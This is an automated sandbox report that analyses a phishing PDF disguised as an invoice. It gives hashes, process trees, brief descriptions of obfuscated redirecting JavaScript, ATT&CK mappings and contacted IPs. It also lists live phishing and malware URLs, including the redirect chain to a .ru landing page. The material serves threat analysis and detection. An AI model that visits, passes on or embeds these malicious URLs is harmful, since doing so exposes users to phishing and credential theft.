Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01-06-2025 Docu.invpd (1).pdf

Overview

General Information

Sample name:01-06-2025 Docu.invpd (1).pdf
Analysis ID:1585535
MD5:315bd39e7cd776a32764aba224148061
SHA1:3fed7458afea256b487d08da66aca463c1b7c9ed
SHA256:5cc28fdb5a96a7ccfb707273f18427049999e836ce365ca2612380740725ed42
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
IP address seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7428 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\01-06-2025 Docu.invpd (1).pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7596 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7800 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1580,i,5074300212230289565,10346747245355225943,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://tcplfmx6.r.us-east-2.awstrack.me/L0/https:%2F%2Fdeql66fwe8583.z13.web.core.windows.net%2F/1/010f01943cd1ecb9-bbe42af5-9aa1-4675-a42c-033d8cddf4b3-000000/z4OrKIJY-F2WkXOVH8jddVKadpM=192" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1940,i,2983708879134321863,15791662296439638055,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_198JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_198, type: DROPPED
    Source: PDF documentJoe Sandbox AI: Page contains button: 'Review' Source: 'PDF document'
    Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'review'
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kilivo.trilivarnor.ru/NiKU3ISg/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the script may have a legitimate purpose, such as displaying a CAPTCHA challenge, the use of obfuscated code and interactions with untrusted domains raise significant security concerns. Further investigation is warranted to determine the true nature and intent of this script.
    Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kilivo.trilivarnor.ru/NiKU3ISg/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes a self-executing function that triggers a debugger statement, which could be used to detect and bypass security measures. Overall, this script exhibits a high level of malicious intent and should be considered a significant security risk.
    Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://deql66fwe8583.z13.web.core.windows.net/... This script demonstrates high-risk behavior by redirecting the user to an untrusted domain (kilivo.trilivarnor.ru) without user consent. The use of the URL fragment to construct the new URL is a common technique for obfuscating the final destination, which increases the risk of the redirection leading to a malicious site. Overall, this script exhibits suspicious behavior and poses a significant risk to the user's security and privacy.
    Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kilivo.trilivarnor.ru/NiKU3ISg/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://kilivo.trilivarnor.ru/NiKU3ISg/HTTP Parser: No favicon
    Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
    Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
    Source: chromecache_194.10.drString found in binary or memory: https://kilivo.trilivarnor.ru/NiKU3ISg/
    Source: 01-06-2025 Docu.invpd (1).pdfString found in binary or memory: https://tcplfmx6.r.us-east-2.awstrack.me/L0/https:%2F%2Fdeql66fwe8583.z13.web.core.windows.net%2F/1/
    Source: classification engineClassification label: mal56.phis.winPDF@40/57@0/7
    Source: 01-06-2025 Docu.invpd (1).pdfInitial sample: https://tcplfmx6.r.us-east-2.awstrack.me/l0/https:%2f%2fdeql66fwe8583.z13.web.core.windows.net%2f/1/010f01943cd1ecb9-bbe42af5-9aa1-4675-a42c-033d8cddf4b3-000000/z4orkijy-f2wkxovh8jddvkadpm=192
    Source: 01-06-2025 Docu.invpd (1).pdfInitial sample: https://tcplfmx6.r.us-east-2.awstrack.me/L0/https:%2F%2Fdeql66fwe8583.z13.web.core.windows.net%2F/1/010f01943cd1ecb9-bbe42af5-9aa1-4675-a42c-033d8cddf4b3-000000/z4OrKIJY-F2WkXOVH8jddVKadpM=192
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-07 13-48-52-902.logJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\01-06-2025 Docu.invpd (1).pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1580,i,5074300212230289565,10346747245355225943,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://tcplfmx6.r.us-east-2.awstrack.me/L0/https:%2F%2Fdeql66fwe8583.z13.web.core.windows.net%2F/1/010f01943cd1ecb9-bbe42af5-9aa1-4675-a42c-033d8cddf4b3-000000/z4OrKIJY-F2WkXOVH8jddVKadpM=192"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1940,i,2983708879134321863,15791662296439638055,262144 /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1580,i,5074300212230289565,10346747245355225943,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1940,i,2983708879134321863,15791662296439638055,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 01-06-2025 Docu.invpd (1).pdfInitial sample: PDF keyword /JS count = 0
    Source: 01-06-2025 Docu.invpd (1).pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: 01-06-2025 Docu.invpd (1).pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Spearphishing Link
    Windows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1585535 Sample: 01-06-2025 Docu.invpd (1).pdf Startdate: 07/01/2025 Architecture: WINDOWS Score: 56 27 Yara detected HtmlPhish44 2->27 29 AI detected suspicious Javascript 2->29 31 AI detected landing page (webpage, office document or email) 2->31 7 chrome.exe 1 2->7         started        10 Acrobat.exe 18 70 2->10         started        process3 dnsIp4 19 239.255.255.250 unknown Reserved 7->19 12 chrome.exe 7->12         started        15 AcroCEF.exe 105 10->15         started        process5 dnsIp6 21 142.250.186.132 GOOGLEUS United States 12->21 23 35.190.80.1 GOOGLEUS United States 12->23 25 4 other IPs or domains 12->25 17 AcroCEF.exe 2 15->17         started        process7

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    01-06-2025 Docu.invpd (1).pdf0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    https://kilivo.trilivarnor.ru/NiKU3ISg/true
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        1.1.1.1
        unknownAustralia
        13335CLOUDFLARENETUSfalse
        3.132.58.213
        unknownUnited States
        16509AMAZON-02USfalse
        151.101.130.137
        unknownUnited States
        54113FASTLYUSfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        172.67.179.163
        unknownUnited States
        13335CLOUDFLARENETUSfalse
        142.250.186.132
        unknownUnited States
        15169GOOGLEUSfalse
        35.190.80.1
        unknownUnited States
        15169GOOGLEUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1585535
        Start date and time:2025-01-07 19:47:50 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 28s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowspdfcookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:01-06-2025 Docu.invpd (1).pdf
        Detection:MAL
        Classification:mal56.phis.winPDF@40/57@0/7
        Cookbook Comments:
        • Found application associated with file extension: .pdf
        • Found PDF document
        • Close Viewer
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 184.28.88.176, 3.233.129.217, 52.6.155.20, 52.22.41.97, 3.219.243.226, 2.16.168.107, 2.16.168.105, 162.159.61.3, 172.64.41.3, 23.209.209.135, 199.232.210.172, 192.229.221.95, 23.200.0.33, 23.200.0.21, 192.168.2.4, 142.250.185.174, 74.125.71.84, 172.217.18.3, 57.150.27.164, 142.250.186.142, 216.58.212.170, 142.250.185.74, 142.250.181.234, 142.250.186.106, 216.58.206.42, 172.217.16.202, 216.58.206.74, 172.217.23.106, 216.58.212.138, 142.250.186.42, 172.217.18.10, 142.250.184.202, 142.250.184.234, 172.217.16.138, 142.250.74.202, 142.250.186.138, 142.250.185.106, 142.250.185.138, 142.250.186.74, 142.250.185.170, 216.58.212.174, 142.250.185.78, 172.217.16.142, 142.250.74.206, 142.250.185.142, 172.217.16.195, 172.217.18.14, 172.217.18.110, 142.250.185.110, 172.217.16.206, 142.250.181.238, 184.28.90.27, 23.56.162.204, 20.109.210.53, 13.107.246.45
        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, web.bl5prdstr19c.store.core.windows.net, clientservices.googleapis.com, acroipm2.adobe.com, dns.msftncsi.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, deql66fwe8583.z13.web.core.windows.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: 01-06-2025 Docu.invpd (1).pdf
        TimeTypeDescription
        13:49:03API Interceptor3x Sleep call for process: AcroCEF.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        1.1.1.16fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
        • 1.1.1.1/ctrl/playback.php
        PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
        • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
        AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
        • 1.1.1.1/
        INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
        • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
        Go.exeGet hashmaliciousUnknownBrowse
        • 1.1.1.1/
        151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
        • code.jquery.com/jquery-1.11.3.min.js
        http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
        • code.jquery.com/jquery-1.11.3.min.js
        http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
        • code.jquery.com/jquery-1.7.min.js
        https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
        • code.jquery.com/jquery-3.3.1.min.js
        http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
        • code.jquery.com/jquery-1.7.2.min.js
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        CLOUDFLARENETUShttps://creditunions.taplink.wsGet hashmaliciousHTMLPhisherBrowse
        • 172.67.74.23
        https://temp.farenheit.net/XZ1ZEKzFsR0pndUdHTEgydlg4dElJdnYwT0hjRkpzdVVSUm1ub0VGNFQ3Y0ZmKzFxM3I2dUJxaTkwbXEvV1dSWUM0MG5LUitrcGV2THJ0Q2o4cWUvRGxkd1l4MmcySE41YUtFUHo4RzZXM014SWRPampra2ZwMVVWNGhFTGh4WW9NU3BQaCtFRUFTMXdkc2ZiNUdhS284ek8xMTVuaS9UdExEa3lOT2hoa3R4SGg1bFIra241ZE02M1pDRVdDWVN2U3QraDRvZEVVOUMyM1J1Y1pHbGJiZ2Y1b1c4TGIxakFzVWhuc0E9PS0td2twbkU5Q0xKY3VWbzc3Ny0tQW5QTkZPazI2ajU5aTJUSjlRQkZtZz09?cid=2308276481Get hashmaliciousKnowBe4Browse
        • 104.17.249.203
        ATT562720.htmGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        https://gmail.net-login.com/XcXRYNDdyQ3ZtSld4UE4wVUJrekFCdThLQ2ZDbXJubWlkcy85YXZZRFpSOGRHZ0lqc1lEVlJhUFJ4T1JpVkZYRHlPM2luOWZsUlg0akRFL0JzN3BQNEMzS2I3QUtSaG9zWXhKL1R0cG5TcEV6YUpSMkZRT1BkNGd1eVg1eHFjTW5CbVFQV0l5RXdmVG9qV2tod3dRS0ZpbkcvY3EwZk91cnM4R003RE1ESDZkNUoxOTZyTTZQcEExKy0tVmRVQklXeHltU1Jqc0VOaS0tMDhlR1IwQTdzanVybEhTdHNlbmhsZz09?cid=2354608568Get hashmaliciousKnowBe4Browse
        • 104.17.247.203
        https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
        • 104.18.95.41
        FACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
        • 108.162.193.94
        http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
        • 172.67.74.152
        https://www.facebook.com/nd/?groups%2F1890503424692037%2Frequests%2F&aref=1736211772582402&medium=email&mid=62b1fb1698c7dG5b016dc7de4cG62b134df5aa02G15&bcode=2.1736266217.AbwE-ZmXZYS4oNRxqqE&n_m=kbaker%40beachbody.com&n_sg=Q6bPBAFZX1Mx9VszlkbcFfVLHA3nPTNzix2i89aoCYRx0_63xA&rms=v2&irms=1Get hashmaliciousUnknownBrowse
        • 1.1.1.1
        https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
        • 104.22.57.245
        Solara_v3.exeGet hashmaliciousUnknownBrowse
        • 104.20.4.235
        FASTLYUSATT562720.htmGet hashmaliciousUnknownBrowse
        • 151.101.66.137
        https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
        • 151.101.2.137
        http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
        • 151.101.194.137
        94.156.227.153-sora.x86-2025-01-07T16_09_13.elfGet hashmaliciousMiraiBrowse
        • 151.101.194.49
        Customer.exeGet hashmaliciousXWormBrowse
        • 185.199.111.133
        https://www.kentuckyfriedsalmonpadon.com/caHbBZmGet hashmaliciousUnknownBrowse
        • 151.101.64.84
        Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
        • 185.199.109.133
        Solara.exeGet hashmaliciousUnknownBrowse
        • 185.199.108.133
        Airbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
        • 151.101.2.137
        https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
        • 151.101.128.176
        CLOUDFLARENETUShttps://creditunions.taplink.wsGet hashmaliciousHTMLPhisherBrowse
        • 172.67.74.23
        https://temp.farenheit.net/XZ1ZEKzFsR0pndUdHTEgydlg4dElJdnYwT0hjRkpzdVVSUm1ub0VGNFQ3Y0ZmKzFxM3I2dUJxaTkwbXEvV1dSWUM0MG5LUitrcGV2THJ0Q2o4cWUvRGxkd1l4MmcySE41YUtFUHo4RzZXM014SWRPampra2ZwMVVWNGhFTGh4WW9NU3BQaCtFRUFTMXdkc2ZiNUdhS284ek8xMTVuaS9UdExEa3lOT2hoa3R4SGg1bFIra241ZE02M1pDRVdDWVN2U3QraDRvZEVVOUMyM1J1Y1pHbGJiZ2Y1b1c4TGIxakFzVWhuc0E9PS0td2twbkU5Q0xKY3VWbzc3Ny0tQW5QTkZPazI2ajU5aTJUSjlRQkZtZz09?cid=2308276481Get hashmaliciousKnowBe4Browse
        • 104.17.249.203
        ATT562720.htmGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        https://gmail.net-login.com/XcXRYNDdyQ3ZtSld4UE4wVUJrekFCdThLQ2ZDbXJubWlkcy85YXZZRFpSOGRHZ0lqc1lEVlJhUFJ4T1JpVkZYRHlPM2luOWZsUlg0akRFL0JzN3BQNEMzS2I3QUtSaG9zWXhKL1R0cG5TcEV6YUpSMkZRT1BkNGd1eVg1eHFjTW5CbVFQV0l5RXdmVG9qV2tod3dRS0ZpbkcvY3EwZk91cnM4R003RE1ESDZkNUoxOTZyTTZQcEExKy0tVmRVQklXeHltU1Jqc0VOaS0tMDhlR1IwQTdzanVybEhTdHNlbmhsZz09?cid=2354608568Get hashmaliciousKnowBe4Browse
        • 104.17.247.203
        https://sites.google.com/view/jet-consultation-llc/homeGet hashmaliciousUnknownBrowse
        • 104.18.95.41
        FACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
        • 108.162.193.94
        http://sammobile.digidip.net/visit?url=https://massageclinic.com.au/wadblacks2&currurl=https://www.sammobile.com/2018/06/06/june-2018-security-patch-information-published-by-samsung/Get hashmaliciousGabagoolBrowse
        • 172.67.74.152
        https://www.facebook.com/nd/?groups%2F1890503424692037%2Frequests%2F&aref=1736211772582402&medium=email&mid=62b1fb1698c7dG5b016dc7de4cG62b134df5aa02G15&bcode=2.1736266217.AbwE-ZmXZYS4oNRxqqE&n_m=kbaker%40beachbody.com&n_sg=Q6bPBAFZX1Mx9VszlkbcFfVLHA3nPTNzix2i89aoCYRx0_63xA&rms=v2&irms=1Get hashmaliciousUnknownBrowse
        • 1.1.1.1
